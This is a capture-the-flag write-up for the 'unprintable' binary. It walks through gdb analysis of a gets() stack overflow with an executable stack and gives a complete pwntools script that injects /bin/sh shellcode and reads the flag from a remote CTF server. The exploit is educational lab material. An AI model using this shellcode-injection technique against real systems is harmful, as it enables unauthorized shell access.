# unprintable

We are given a binary called unprintable:

```
$ file unprintable
unprintable: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ce185005bac079b156a3970d40bb29629e287653, not stripped
$ pwn checksec unprintable
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
```

NX is disabled!! This means that the stack is executable, so we can write instructions to the stack and then execute them directly.

Let's try running it to see if it gives us the flag:

```
$ ./unprintable
I found some empty room in the RAM on this system, and prepared some especially for you!
But I'm worried you might put something evil in it, so I'm not going to print it out
Here's your special RAM, happy birthday!: 0x7ffe4a3d0ea0
What are you going to do with it?
pop a shell
I hope you enjoyed your memory!
```

Nope, didn't give us the flag. But it gave us a memory address!! That will probably be useful. We can also input some stuff after it asks us what we're going to do with the memory, so the obvious response is `pop a shell`. That didn't work though, guess we'll have to try a little harder.

Just by reading the output, it sounds like what's happening is that the address that gets printed out is actually the address of the buffer that we get to write stuff to. We can verify this in gdb:

```
$  gdb ./unprintable
pwndbg: loaded 192 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./unprintable...(no debugging symbols found)...done.
pwndbg> disass input
Dump of assembler code for function input:
   0x00000000000006ca <+0>:     push   %rbp
   0x00000000000006cb <+1>:     mov    %rsp,%rbp
   0x00000000000006ce <+4>:     sub    $0x70,%rsp
   0x00000000000006d2 <+8>:     lea    -0x70(%rbp),%rax
   0x00000000000006d6 <+12>:    mov    %rax,%rsi
   0x00000000000006d9 <+15>:    lea    0xf8(%rip),%rdi        # 0x7d8
   0x00000000000006e0 <+22>:    mov    $0x0,%eax
   0x00000000000006e5 <+27>:    callq  0x590 <printf@plt>
   0x00000000000006ea <+32>:    lea    0x117(%rip),%rdi        # 0x808
   0x00000000000006f1 <+39>:    callq  0x580 <puts@plt>
   0x00000000000006f6 <+44>:    lea    -0x70(%rbp),%rax
   0x00000000000006fa <+48>:    mov    %rax,%rdi
   0x00000000000006fd <+51>:    mov    $0x0,%eax
   0x0000000000000702 <+56>:    callq  0x5a0 <gets@plt>
   0x0000000000000707 <+61>:    nop
   0x0000000000000708 <+62>:    leaveq
   0x0000000000000709 <+63>:    retq
End of assembler dump.
pwndbg> b *input+61
Breakpoint 1 at 0x707
pwndbg> r
Starting program: /home/allen/OSUSEC/CTF-League/pwn/chal3/unprintable
I found some empty room in the RAM on this system, and prepared some especially for you!
But I'm worried you might put something evil in it, so I'm not going to print it out
Here's your special RAM, happy birthday!: 0x7fffffffdd80 
What are you going to do with it?
something

Breakpoint 1, 0x0000555555554707 in input ()
pwndbg> search something
unprintable     0x5555555548ae jae    0x55555555491f /* "something evil in it, so I'm not going to print it out" */
unprintable     0x5555557548ae jae    0x55555575491f /* "something evil in it, so I'm not going to print it out" */
[heap]          0x555555756670 'something\n'
warning: Unable to access 16000 bytes of target memory at 0x7ffff7bd2d08, halting search.
[stack]         0x7fffffffdd80 'something'
pwndbg>
```

It looks like our prediction was correct! The memory address that we're given points to the start of our buffer. Also, we can input however many bytes we want, because of the `gets` call at `*input+56`. Before we close gdb and start on the exploit, let's see if we can also get the offset from the start of the buffer to the saved return address:

```
pwndbg> i f
Stack level 0, frame at 0x7fffffffde00:
 rip = 0x555555554707 in input; saved rip = 0x555555554730
 called by frame at 0x7fffffffde10
 Arglist at 0x7fffffffddf0, args:
 Locals at 0x7fffffffddf0, Previous frame's sp is 0x7fffffffde00
 Saved registers:
  rbp at 0x7fffffffddf0, rip at 0x7fffffffddf8
pwndbg> p 0xddf8 - 0xdd80
$1 = 120
pwndbg>
```

Here, we look for the adress of the saved rip (`0x7fffffffddf8`) and subtract the address of the start of the buffer (`0x7fffffffdd80`) that we found by searching for the text we input into it. This comes out to an offset of 120 bytes, so we need to fill the buffer with 120 bytes before overwriting the return address.

Here's our plan:
- Fill the first part of the buffer with some shellcode that calls `/bin/sh` (gives us a shell)
    - Shellcode should be less than 120 bytes
- Write padding to fill up the rest of the 120 bytes
- Overwrite the saved return address with the address of the start of the buffer
- Pop a shell!

This is what we want the stack to look like:
```
higher addresses
                    +-------------------------------------------+
                    |         return address (saved rip)        |
                    +-------------------------------------------+ <----+
                    |            padding (AAAAAAAA...)          |      |
                    +-------------------------------------------+      |
                    |                                           |    120 bytes
                    |              /bin/sh shellcode            |      |
                    |                                           |      |
start of buffer --> +-------------------------------------------+ <----+
                    |                                           |
                    +-------------------------------------------+
lower addresses
```

Keeping all these things in mind, let's use pwntools to write an exploit:

```python
# import everything from pwntools
from pwn import *

# We have a 64-bit linux binary, make sure pwntools knows that
context.update(arch='amd64', os='linux')

# Local process
#p = process('./unprintable')

# Remote process
p = remote('ctf.ropcity.com', 31337)

# receive everything up until the start of the memory address we're given
p.recvuntil('birthday!: ')

# get only the part after 0x and before the newline character, then convert it to an actual integer in hex
addr = int(p.recvline()[2:-1], 16)

print("Start of buffer: %s" % hex(addr))

# use shellcraft to get /bin/sh assembly code
binsh = shellcraft.sh()

# assemble the shellcode (get the raw opcodes to send)
shellcode = asm(binsh)

# add the padding to get us to 120 bytes
payload = shellcode.ljust(120, b'A')

# overwrite return address with the address of the start of our shellcode
# p64 sends bytes in the correct format for our binary
payload += p64(addr)

# get any leftover text that is being sent
p.recv()

# send the payload!
p.sendline(payload)

# now we should have a shell, switch to interactive mode
p.interactive()
```


Run the exploit, pop a shell, cat the flag.
```
$ python3 exploit.py
[+] Opening connection to ctf.ropcity.com on port 31337: Done
Start of buffer: 0x7ffc7bfeeaf0
[*] Switching to interactive mode
$ ls
flag  unprintable
$ cat flag
osu{i_c0uldnt_pr1nt_th4t_1f_I_tRi3ed!!!1!}
$
```